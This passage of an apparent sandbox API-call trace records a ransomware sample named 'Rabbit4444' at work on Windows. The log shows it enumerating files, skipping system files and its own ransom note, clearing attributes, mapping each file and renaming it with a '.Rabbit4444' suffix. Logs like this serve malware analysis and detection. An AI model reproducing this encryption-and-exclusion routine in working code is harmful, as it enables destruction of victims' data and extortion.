out: lpString1="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms") returned="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms" [0059.117] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.117] lstrlenW (lpString="Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms") returned 64 [0059.117] lstrlenW (lpString="Rabbit4444") returned 10 [0059.117] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.117] lstrlenW (lpString=".dll") returned 4 [0059.117] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.117] lstrlenW (lpString=".lnk") returned 4 [0059.117] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.117] lstrlenW (lpString=".ini") returned 4 [0059.117] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.117] lstrlenW (lpString=".sys") returned 4 [0059.117] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.118] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{88c9d04d-39dd-41ee-a63b-23218d69717f}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.118] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.118] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15042861372) returned 1 [0059.118] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=974) returned 1 [0059.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.118] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0059.119] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0059.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.120] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.120] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.120] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.120] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.120] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.120] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15043117118) returned 1 [0059.120] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0059.121] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.121] CloseHandle (hObject=0x298) returned 1 [0059.121] CloseHandle (hObject=0x278) returned 1 [0059.121] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms.Rabbit4444") returned 192 [0059.121] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{88c9d04d-39dd-41ee-a63b-23218d69717f}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{88c9d04d-39dd-41ee-a63b-23218d69717f}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.122] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532ce9db, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x532ce9db, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", cAlternateFileName="CL0E9F~1.SET")) returned 1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2=".") returned 1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="..") returned 1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="windows") returned -1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="boot") returned 1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.122] lstrcmpiW (lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.122] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms" | out: lpString1="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms") returned="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms" [0059.122] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.122] lstrlenW (lpString="Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms") returned 64 [0059.122] lstrlenW (lpString="Rabbit4444") returned 10 [0059.122] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.122] lstrlenW (lpString=".dll") returned 4 [0059.122] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.122] lstrlenW (lpString=".lnk") returned 4 [0059.122] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.122] lstrlenW (lpString=".ini") returned 4 [0059.122] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.122] lstrlenW (lpString=".sys") returned 4 [0059.123] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.123] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8902c92d-5ab7-433b-9065-3f55f8334e29}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.123] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.123] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15043363939) returned 1 [0059.123] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1243) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.123] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0059.123] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0059.124] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0059.125] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.125] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.125] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.125] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.125] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.125] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.126] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15043634302) returned 1 [0059.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.126] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0059.126] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.126] CloseHandle (hObject=0x298) returned 1 [0059.126] CloseHandle (hObject=0x278) returned 1 [0059.126] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms.Rabbit4444") returned 192 [0059.126] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8902c92d-5ab7-433b-9065-3f55f8334e29}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8902c92d-5ab7-433b-9065-3f55f8334e29}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.127] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53367347, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53367347, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", cAlternateFileName="CL7DF2~1.SET")) returned 1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2=".") returned 1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="..") returned 1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="windows") returned -1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="boot") returned 1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.127] lstrcmpiW (lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.127] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms" | out: lpString1="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms") returned="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms" [0059.127] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.127] lstrlenW (lpString="Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms") returned 64 [0059.127] lstrlenW (lpString="Rabbit4444") returned 10 [0059.127] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.127] lstrlenW (lpString=".dll") returned 4 [0059.127] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.128] lstrlenW (lpString=".lnk") returned 4 [0059.128] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.128] lstrlenW (lpString=".ini") returned 4 [0059.128] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.128] lstrlenW (lpString=".sys") returned 4 [0059.128] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.128] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{895607e0-d0f9-48bd-b19e-96fbe9bbdcf9}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.128] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.128] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15043877517) returned 1 [0059.128] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1016) returned 1 [0059.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0059.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0059.128] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.129] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.130] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.131] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15044169629) returned 1 [0059.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0059.131] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0059.131] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.131] CloseHandle (hObject=0x298) returned 1 [0059.131] CloseHandle (hObject=0x278) returned 1 [0059.131] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms.Rabbit4444") returned 192 [0059.131] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{895607e0-d0f9-48bd-b19e-96fbe9bbdcf9}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{895607e0-d0f9-48bd-b19e-96fbe9bbdcf9}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.132] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5344c166, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5344c166, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", cAlternateFileName="CLB484~1.SET")) returned 1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2=".") returned 1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="..") returned 1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="windows") returned -1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.132] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.133] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="boot") returned 1 [0059.133] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.133] lstrcmpiW (lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.133] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms" | out: lpString1="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms") returned="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms" [0059.133] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.133] lstrlenW (lpString="Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms") returned 64 [0059.133] lstrlenW (lpString="Rabbit4444") returned 10 [0059.133] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.133] lstrlenW (lpString=".dll") returned 4 [0059.133] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.133] lstrlenW (lpString=".lnk") returned 4 [0059.133] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.133] lstrlenW (lpString=".ini") returned 4 [0059.133] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.133] lstrlenW (lpString=".sys") returned 4 [0059.133] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.133] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.134] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.134] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15044438537) returned 1 [0059.134] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=930) returned 1 [0059.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0059.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.134] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.135] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.136] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.136] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.136] QueryPerformanceCounter 